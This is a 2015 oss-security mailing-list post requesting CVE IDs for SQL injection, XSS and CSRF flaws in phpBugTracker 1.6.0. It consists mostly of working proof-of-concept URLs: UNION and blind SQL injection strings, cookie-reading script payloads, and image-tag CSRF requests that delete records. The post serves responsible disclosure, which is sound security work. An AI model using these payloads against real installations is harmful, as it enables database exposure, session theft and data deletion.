Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CALH-=7xNSR8BgHdFxMgzQ0Rwfu9_ffVNWOZRN3my+OPLbjHZLQ@mail.gmail.com>
Date: Sat, 21 Feb 2015 13:32:20 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- phpBugTracker v. 1.6.0 -- Multiple SQLi,
 stored/reflecting XSS- and CSRF-vulnerabilities

Hi Steve, Josh, vendors, list.

I found multiple SQLI-, stored/reflecting XSS- and CSRF-vulnerabilities in
Issuetracker phpBugTracker v. 1.6.0.

The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:

===========
project.php
===========

SQL injection / underlaying CSRF vulnerability  in project.php via id
parameter:

http://
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+

Stored XSS via input field "project name":

http://{TARGET}/admin/project.php?op=add

executed in: e.g. http://{TARGET}/admin/project.php, http://
{TARGET}/index.php


========
user.php
========

Reflecting XSS in user.php via use_js parameter:

http://
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1

executed in: same page


=========
group.php
=========

Reflecting XSS in group.php via use_js parameter:

http://
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1

executed in: same page

(Blind) SQL Injection / underlaying CSRF vulnerability  in group.php via
group_id parameter (used in different operations):

http://
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+


==========
status.php
==========

SQL injection / underlaying CSRF vulnerability  in status.php via status_id
parameter:

http://
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

Stored XSS via input field "Description":

http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0

executed in: e.g. http://{TARGET}/admin/status.php

CSRF vulnerability in status.php (delete statuses):

<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
>


==============
resolution.php
==============

SQL injection / underlaying CSRF vulnerability  in resolution.php via
resolution_id parameter:

http://
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in resolution.php (delete resolutions):

<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
>


============
severity.php
============

SQL injection / underlaying CSRF vulnerability  in severity.php via
severity_id parameter:

http://
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

CSRF vulnerability in severity.php (delete severities):

<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
>

Stored XSS in severity.php via input field "Description":

http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0

executed in: e.g. http://{TARGET}/admin/severity.php


============
priority.php
============

SQL injection / underlaying CSRF vulnerability in priority.php via
priority_id parameter:

http://
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+


======
os.php
======

SQL Injection / underlaying CSRF vulnerability in os.php via os_id
parameter:

http://
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in os.php (delete operating systems):

<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >

Stored XSS vulnerability in os.php via input field "Regex":

http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0

executed in: e.g. http://{TARGET}/admin/os.php?


============
database.php
============

SQL injection / underlaying CSRF vulnerability in database.php via
database_id:

http://
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+

CSRF vulnerability in database.php (delete databases):

<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
>

Stored XSS vulnerability in database.php via input field "Name":

http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0


========
site.php
========

CSRF vulnerability in site.php (delete sites):

<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >

SQL injection / underlaying CSRF vulnerability in site.php via site_id
parameter:

http://
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+

Can I have a CVE-ID/CVE-IDs for the issues, please?

Thank you very much!

Greetings from Germany.

Steffen Rösemann

References:

[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker
[5] http://seclists.org/fulldisclosure/2015/Feb/83

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.